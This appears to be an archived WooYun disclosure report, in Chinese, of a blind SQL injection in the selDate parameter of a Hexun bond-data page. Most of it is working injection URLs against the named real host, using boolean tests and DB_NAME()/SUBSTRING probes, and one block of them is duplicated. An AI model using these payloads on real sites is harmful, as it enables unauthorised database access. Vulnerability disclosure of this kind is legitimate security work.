乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-31: 细节已通知厂商并且等待厂商处理中 2014-09-01: 厂商已经确认,细节仅向厂商公开 2014-09-11: 细节向核心白帽子及相关领域专家公开 2014-09-21: 细节向普通白帽子公开 2014-10-01: 细节向实习白帽子公开 2014-10-15: 细节向公众公开
和讯网某站点存在sql盲注
存在漏洞网站http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17selDate参数存在注入注入测试
http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=1%20and%20'1'='1 //返回正常 http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=2%20and%20'1'='1 //返回错误 判断数据库长度为7http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20len(DB_NAME())=7%20and%20'1'='1测试当前数据库http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20SUBSTRING(DB_NAME(),1,1)='d'%20and%20'1'='1http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20SUBSTRING(DB_NAME(),1,7)='db_info'%20and%20'1'='1 返回正常故当前数据数据库为db_info
http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=2%20and%20'1'='1 //返回错误
判断数据库长度为7http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20len(DB_NAME())=7%20and%20'1'='1测试当前数据库http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20SUBSTRING(DB_NAME(),1,1)='d'%20and%20'1'='1http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%20SUBSTRING(DB_NAME(),1,7)='db_info'%20and%20'1'='1 返回正常故当前数据数据库为db_info
可以过来长度或者正则匹配
危害等级:中
漏洞Rank:7
确认时间:2014-09-01 10:41
谢谢
暂无